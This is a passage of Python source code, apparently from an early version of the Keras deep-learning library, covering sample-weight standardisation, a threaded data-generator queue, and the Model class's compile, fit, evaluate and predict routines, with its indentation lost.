mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
return K.mean(score_array)
return masked
def _standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
"""Performs sample weight validation and standardization.
Everything gets normalized to a single sample-wise (or timestep-wise)
weight array.
# Arguments
y: Numpy array of model targets to be weighted.
sample_weight: User-provided `sample_weight` argument.
class_weight: User-provided `class_weight` argument.
sample_weight_mode: One of `None` or `"temporal"`.
`"temporal"` indicated that we expect 2D weight data
that will be applied to the last 2 dimensions of
the targets (i.e. we are weighting timesteps, not samples).
# Returns
A numpy array of target weights, one entry per sample to weight.
# Raises
ValueError: In case of invalid user-provided arguments.
"""
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
raise ValueError('"sample_weight_mode '
'should be None or "temporal". '
'Found: ' + str(sample_weight_mode))
if len(y.shape) < 3:
raise ValueError('Found a sample_weight array for '
'an input with shape ' +
str(y.shape) + '. '
'Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weights, '
'you should specify '
'sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
if len(sample_weight.shape) > len(y.shape):
raise ValueError('Found a sample_weight with shape' +
str(sample_weight.shape) + '.'
'Expected sample_weight with rank '
'less than or equal to ' + str(len(y.shape)))
if y.shape[:sample_weight.ndim] != sample_weight.shape:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + ' for an input with shape ' +
str(y.shape) + '. '
'sample_weight cannot be broadcast.')
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise ValueError('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],), dtype=K.floatx())
else:
return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
class GeneratorEnqueuer(object):
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
pickle_safe: use multiprocessing if True, otherwise threading
"""
def __init__(self, generator, pickle_safe=False):
self._generator = generator
self._pickle_safe = pickle_safe
self._threads = []
self._stop_event = None
self.queue = None
def start(self, workers=1, max_q_size=10, wait_time=0.05):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_q_size: queue size (when full, threads could block on put())
wait_time: time to sleep in-between calls to put()
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._pickle_safe or self.queue.qsize() < max_q_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._pickle_safe:
self.queue = multiprocessing.Queue(maxsize=max_q_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
if self._pickle_safe:
# Reset random seed else all children processes
# share the same seed
np.random.seed()
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = True
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._pickle_safe:
thread.terminate()
else:
thread.join(timeout)
if self._pickle_safe:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
class Model(Container):
"""The `Model` class adds training & evaluation routines to a `Container`.
"""
def compile(self, optimizer, loss, metrics=None, loss_weights=None,
sample_weight_mode=None, **kwargs):
"""Configures the model for training.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [losses](/losses).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of losses.
The loss value that will be minimized by the model
will then be the sum of all individual losses.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
loss_weights: Optional list or dictionary specifying scalar
coefficients (Python floats) to weight the loss contributions
of different model outputs.
The loss value that will be minimized by the model
will then be the *weighted sum* of all individual losses,
weighted by the `loss_weights` coefficients.
If a list, it is expected to have a 1:1 mapping
to the model's outputs. If a tensor, it is expected to map
output names (strings) to scalar coefficients.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to `"temporal"`.
`None` defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
**kwargs: when using the Theano backend, these arguments
are passed into K.function. When using the Tensorflow backend,
these arguments are passed into `tf.Session.run`.
# Raises
ValueError: In case of invalid arguments for
`optimizer`, `loss`, `metrics` or `sample_weight_mode`.
"""
loss = loss or {}
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# Prepare loss functions.
if isinstance(loss, dict):
for name in loss:
if name not in self.output_names:
raise ValueError('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
warnings.warn('Output "' + name +
'" missing from loss dictionary. '
'We assume this was done on purpose, '
'and we will not be expecting '
'any data to be passed to "' + name +
'" during training.', stacklevel=2)
loss_functions.append(losses.get(loss.get(name)))
elif isinstance(loss, list):
if len(loss) != len(self.outputs):
raise ValueError('When passing a list as loss, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [losses.get(l) for l in loss]
else:
loss_function = losses.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [_weighted_masked_objective(fn) for fn in loss_functions]
skip_indices = []
self._feed_outputs = []
self._feed_output_names = []
self._feed_output_shapes = []
self._feed_loss_fns = []
for i in range(len(weighted_losses)):
if weighted_losses[i] is None:
skip_indices.append(i)
else:
self._feed_outputs.append(self.outputs[i])
self._feed_output_names.append(self.output_names[i])
self._feed_output_shapes.append(self.internal_output_shapes[i])
self._feed_loss_fns.append(self.loss_functions[i])
# Prepare output masks.
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if not isinstance(masks, list):
masks = [masks]
# Prepare loss weights.
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif isinstance(loss_weights, dict):
for name in loss_weights:
if name not in self.output_names:
raise ValueError('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif isinstance(loss_weights, list):
if len(loss_weights) != len(self.outputs):
raise ValueError('When passing a list as loss_weights, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss_weights))
loss_weights_list = loss_weights
else:
raise TypeError('Could not interpret loss_weights argument: ' +
str(loss_weights) +
' - expected a list of dicts.')
# Prepare sample weights.
sample_weights = []
sample_weight_modes = []
if isinstance(sample_weight_mode, dict):
for name in sample_weight_mode:
if name not in self.output_names:
raise ValueError('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
for i, name in enumerate(self.output_names):
if i in skip_indices:
weight = None
sample_weight_modes.append(None)
else:
if name not in sample_weight_mode:
raise ValueError('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2,
name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1,
name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
elif isinstance(sample_weight_mode, list):
if len(sample_weight_mode) != len(self.outputs):
raise ValueError('When passing a list as sample_weight_mode, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed '
'sample_weight_mode=' +
str(sample_weight_mode))
for i in range(len(self.output_names)):
if i in skip_indices:
weight = None
sample_weight_modes.append(None)
else:
mode = sample_weight_mode[i]
name = self.output_names[i]
if mode == 'temporal':
weight = K.placeholder(ndim=2,
name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1,
name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
else:
for i, name in enumerate(self.output_names):
if i in skip_indices:
sample_weight_modes.append(None)
sample_weights.append(None)
else:
if sample_weight_mode == 'temporal':
sample_weights.append(
K.placeholder(ndim=2,
name=name + '_sample_weights'))
sample_weight_modes.append('temporal')
else:
sample_weights.append(
K.placeholder(ndim=1,
name=name + '_sample_weights'))
sample_weight_modes.append(None)
self.sample_weight_modes = sample_weight_modes
self._feed_sample_weight_modes = []
for i in range(len(self.outputs)):
if i not in skip_indices:
self._feed_sample_weight_modes.append(self.sample_weight_modes[i])
# Prepare targets of model.
self.targets = []
self._feed_targets = []
for i in range(len(self.outputs)):
if i in skip_indices:
self.targets.append(None)
else:
shape = self.internal_output_shapes[i]
name = self.output_names[i]
target = K.placeholder(ndim=len(shape),
name=name + '_target',
sparse=K.is_sparse(self.outputs[i]),
dtype=K.dtype(self.outputs[i]))
self.targets.append(target)
self._feed_targets.append(target)
# Prepare metrics.
self.metrics = metrics
self.metrics_names = ['loss']
self.metrics_tensors = []
# Compute total loss.
total_loss = None
for i in range(len(self.outputs)):
if i in skip_indices:
continue
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics_tensors.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
if total_loss is None:
if not self.losses:
raise RuntimeError('The model cannot be compiled '
'because it has no loss to optimize.')
else:
total_loss = 0.
# Add regularization penalties
# and other layer-specific losses.
for loss_tensor in self.losses:
total_loss += loss_tensor
# List of same size as output_names.
# contains tuples (metrics for output, names of metrics).
nested_metrics = _collect_metrics(metrics, self.output_names)
def append_metric(layer_num, metric_name, metric_tensor):
"""Helper function used in loop below."""
if len(self.output_names) > 1:
metric_name = self.output_layers[layer_num].name + '_' + metric_name
self.metrics_names.append(metric_name)
self.metrics_tensors.append(metric_tensor)
for i in range(len(self.outputs)):
if i in skip_indices:
continue
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy
# (because of class mode duality)
output_shape = self.internal_output_shapes[i]
acc_fn = None
if (output_shape[-1] == 1 or
self.loss_functions[i] == losses.binary_crossentropy):
# case: binary accuracy
acc_fn = metrics_module.binary_accuracy
elif self.loss_functions[i] == losses.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
acc_fn = metrics_module.sparse_categorical_accuracy
else:
acc_fn = metrics_module.categorical_accuracy
masked_fn = _masked_objective(acc_fn)
append_metric(i, 'acc', masked_fn(y_true, y_pred, mask=masks[i]))
else:
metric_fn = metrics_module.get(metric)
masked_metric_fn = _masked_objective(metric_fn)
metric_result = masked_metric_fn(y_true, y_pred, mask=masks[i])
metric_result = {
metric_fn.__name__: metric_result
}
for name, tensor in six.iteritems(metric_result):
append_metric(i, name, tensor)
# Prepare gradient updates and state updates.
self.total_loss = total_loss
self.sample_weights = sample_weights
self._feed_sample_weights = []
for i in range(len(self.sample_weights)):
if i not in skip_indices:
self._feed_sample_weights.append(sample_weights[i])
# Functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
# Collected trainable weights and sort them deterministically.
trainable_weights = self.trainable_weights
# Sort weights by name.
if trainable_weights:
if K.backend() == 'theano':
trainable_weights.sort(key=lambda x: x.name if x.name else x.auto_name)
else:
trainable_weights.sort(key=lambda x: x.name)
self._collected_trainable_weights = trainable_weights
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise RuntimeError('You must compile your model before using it.')
if self.train_function is None:
inputs = self._feed_inputs + self._feed_targets + self._feed_sample_weights
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs += [K.learning_phase()]
training_updates = self.optimizer.get_updates(
self._collected_trainable_weights,
self.constraints,
self.total_loss)
updates = self.updates + training_updates
# Gets loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
name='train_function',
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise RuntimeError('You must compile your model before using it.')
if self.test_function is None:
inputs = self._feed_inputs + self._feed_targets + self._feed_sample_weights
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs += [K.learning_phase()]
# Return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
name='test_function',
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs = self._feed_inputs + [K.learning_phase()]
else:
inputs = self._feed_inputs
# Gets network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
name='predict_function',
**kwargs)
def _fit_loop(self, f, ins, out_labels=None, batch_size=32,
epochs=100, verbose=1, callbacks=None,
val_f=None, val_ins=None, shuffle=True,
callback_metrics=None, initial_epoch=0):
"""Abstract fit function for `f(ins)`.
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
epochs: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of list the display names of the outputs of
`f` and the list of display names of the outputs of `f_val`.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
`History` object.
"""
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
if ins and hasattr(ins[0], 'shape'):
num_train_samples = ins[0].shape[0]
else:
# May happen if we are running `fit` without Numpy input data,
# i.e. if all inputs to the models are data tensors
# instead of placeholders.
# In that case we will run `fit` over a single batch.
num_train_samples = batch_size
verbose = 2
index_array = np.arange(num_train_samples)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + (callbacks or []) + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
out_labels = out_labels or []
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks.set_model(callback_model)
callbacks.set_params({
'batch_size': batch_size,
'epochs': epochs,
'samples': num_train_samples,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics or [],
})
callbacks.on_train_begin()
callback_model.stop_training = False
for cbk in callbacks:
cbk.validation_data = val_ins
for epoch in range(initial_epoch, epochs):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = _batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = _make_batches(num_train_samples, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if isinstance(ins[-1], float):
# Do not slice the training phase flag.
ins_batch = _slice_arrays(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = _slice_arrays(ins, batch_ids)
except TypeError:
raise TypeError('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch)
if not isinstance(outs, list):
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if callback_model.stop_training:
break
if batch_index == len(batches) - 1: # Last batch.
if do_validation:
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# Same labels assumed.
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
"""Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
"""
if ins and hasattr(ins[0], 'shape'):
samples = ins[0].shape[0]
else:
# May happen if we are running `predict` without Numpy input data,
# i.e. if all inputs to the models are data tensors
# instead of placeholders.
# In that case we will run `predict` over a single batch.
samples = batch_size
verbose = 2
outs = []
if verbose == 1:
progbar = Progbar(target=samples)
batches = _make_batches(samples, batch_size)
index_array = np.arange(samples)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if ins and isinstance(ins[-1], float):
# Do not slice the training phase flag.
ins_batch = _slice_arrays(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = _slice_arrays(ins, batch_ids)
batch_outs = f(ins_batch)
if not isinstance(batch_outs, list):
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (samples,) + batch_out.shape[1:]
outs.append(np.zeros(shape, dtype=batch_out.dtype))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
"""Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
if ins and hasattr(ins[0], 'shape'):
samples = ins[0].shape[0]
else:
# May happen if we are running `evaluate` without Numpy input data,
# i.e. if all inputs to the models are data tensors
# instead of placeholders.
# In that case we will run `evaluate` over a single batch.
samples = batch_size
verbose = 2
outs = []
if verbose == 1:
progbar = Progbar(target=samples)
batches = _make_batches(samples, batch_size)
index_array = np.arange(samples)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if isinstance(ins[-1], float):
# Do not slice the training phase flag.
ins_batch = _slice_arrays(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = _slice_arrays(ins, batch_ids)
batch_outs = f(ins_batch)
if isinstance(batch_outs, list):
if batch_index == 0:
for batch_out in enumerate(batch_outs):
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i in range(len(outs)):
outs[i] /= samples
if len(outs) == 1:
return outs[0]
return outs
def _standardize_user_data(self, x, y,
sample_weight=None, class_weight=None,
check_batch_axis=True, batch_size=None):
if not hasattr(self, 'optimizer'):
raise RuntimeError('You must compile a model before '
'training/testing. '
'Use `model.compile(optimizer, loss)`.')
output_shapes = []
for output_shape, loss_fn in zip(self._feed_output_shapes, self._feed_loss_fns):
if loss_fn.__name__ == 'sparse_categorical_crossentropy':
output_shapes.append(output_shape[:-1] + (1,))
elif getattr(losses, loss_fn.__name__, None) is None:
output_shapes.append(None)
else:
output_shapes.append(output_shape)
x = _standardize_input_data(x, self._feed_input_names,
self._feed_input_shapes,
check_batch_axis=False,
exception_prefix='input')
y = _standardize_input_data(y, self._feed_output_names,
output_shapes,
check_batch_axis=False,
exception_prefix='target')
sample_weights = _standardize_sample_weights(sample_weight,
self._feed_output_names)
class_weights = _standardize_class_weights(class_weight,
self._feed_output_names)
sample_weights = [_standardize_weights(ref, sw, cw, mode)
for (ref, sw, cw, mode)
in zip(y, sample_weights, class_weights, self._feed_sample_weight_modes)]
_check_array_lengths(x, y, sample_weights)
_check_loss_and_target_compatibility(y,
self._feed_loss_fns,
self._feed_output_shapes)
if self.stateful and batch_size:
if x[0].shape[0] % batch_size != 0:
raise ValueError('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples')
return x, y, sample_weights
def _get_deduped_metrics_names(self):
out_labels = self.metrics_names
# Rename duplicated metrics name
# (can happen with an output layer shared among multiple dataflows).
deduped_out_labels = []
for i, label in enumerate(out_labels):
new_label = label
if out_labels.count(label) > 1:
dup_idx = out_labels[:i].count(label)
new_label += '_' + str(dup_idx + 1)
deduped_out_labels.append(new_label)
return deduped_out_labels
def fit(self, x=None,
y=None,
batch_size=32,
epochs=1,
verbose=1,
callbacks=None,
validation_split=0.,
validation_data=None,
shuffle=True,
class_weight=None,
sample_weight=None,
initial_epoch=0,
**kwargs):
"""Trains the model for a fixed number of epochs (iterations on a dataset).
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
epochs: integer, the number of times to iterate
over the training data arrays.
verbose: 0, 1, or 2. Verbosity mode.
0 = silent, 1 = verbose, 2 = one log line per epoch.
callbacks: list of callbacks to be called during training.
See [callbacks](/callbacks).
validation_split: float between 0 and 1:
fraction of the training data to be used as validation data.
The model will set apart this fraction of the training data,
will not train on it, and will evaluate
the loss and any model metrics
on this data at the end of each epoch.
validation_data: data on which to evaluate
the loss and any model metrics
at the end of each epoch. The model will not
be trained on this data.
This could be a tuple (x_val, y_val)
or a tuple (x_val, y_val, val_sample_weights).
shuffle: boolean, whether to shuffle the training data
before each epoch.
class_weight: optional dictionary mapping
class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` instance. Its `history` attribute contains
all information collected during training.
# Raises
ValueError: In case of mismatch between the provided input data
and what the model expects.
"""
# Legacy support
if 'nb_epoch' in kwargs:
warnings.warn('The `nb_epoch` argument in `fit` '
'has been renamed `epochs`.', stacklevel=2)
epochs = kwargs.pop('nb_epoch')
if kwargs:
raise TypeError('Unrecognized keyword arguments: ' + str(kwargs))
# Validate user data.
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_axis=False,
batch_size=batch_size)
# Prepare validation data.
if validation_data:
do_validation = True
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise ValueError('When passing validation_data, '
'it must contain 2 (x_val, y_val) '
'or 3 (x_val, y_val, val_sample_weights) '
'items, however it contains %d items' %
len(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(
val_x, val_y,
sample_weight=val_sample_weight,
check_batch_axis=False,
batch_size=batch_size)
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
elif validation_split and 0. < validation_split < 1.:
do_validation = True
split_at = int(len(x[0]) * (1. - validation_split))
x, val_x = (_slice_arrays(x, 0, split_at), _slice_arrays(x, split_at))
y, val_y = (_slice_arrays(y, 0, split_at), _slice_arrays(y, split_at))
sample_weights, val_sample_weights = (
_slice_arrays(sample_weights, 0, split_at),
_slice_arrays(sample_weights, split_at))
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
else:
do_validation = False
val_f = None
val_ins = None
# Prepare input arrays and training function.
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
f = self.train_function
# Prepare display labels.
out_labels = self._get_deduped_metrics_names()
if do_validation:
callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
else:
callback_metrics = copy.copy(out_labels)
# Delegate logic to `_fit_loop`.
return self._fit_loop(f, ins, out_labels=out_labels,
batch_size=batch_size, epochs=epochs,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins, shuffle=shuffle,
callback_metrics=callback_metrics,
initial_epoch=initial_epoch)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
"""Returns the loss value & metrics values for the model in test mode.
Computation is done in batches.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
verbose: verbosity mode, 0 or 1.
sample_weight: Array of weights to weight the contribution
of different samples to the loss and metrics.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
# Validate user data.
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
check_batch_axis=False,
batch_size=batch_size)
# Prepare inputs, delegate logic to `_test_loop`.
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
f = self.test_function
return self._test_loop(f, ins,
batch_size=batch_size,
verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
"""Generates output predictions for the input samples.
Computation is done in batches.
# Arguments
x: the input data, as a Numpy array
(or list of Numpy arrays if the model has multiple outputs).
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
Numpy array(s) of predictions.
# Raises
ValueError: In case of mismatch between the provided
input data and the model's expectations,
or in case a stateful model receives a number of samples
that is not a multiple of the batch size.
"""
# Validate user data.
x = _standardize_input_data(x, self._feed_input_names,
self._feed_input_shapes,
check_batch_axis=False)
if self.stateful:
if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
raise ValueError('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples. '
'Batch size: ' + str(batch_size) + '.')
# Prepare inputs, delegate logic to `_predict_loop`.
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + [0.]
else:
ins = x
self._make_predict_function()
f = self.predict_function
return self._predict_loop(f, ins,
batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
sample_weight=None, class_weight=None):
"""Runs a single gradient update on a single batch of data.
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
class_weight: optional dictionary mapping
class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
# Returns
Scalar training loss
(if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
x, y, sample_weights = self._standardize_user_data(
x, y,
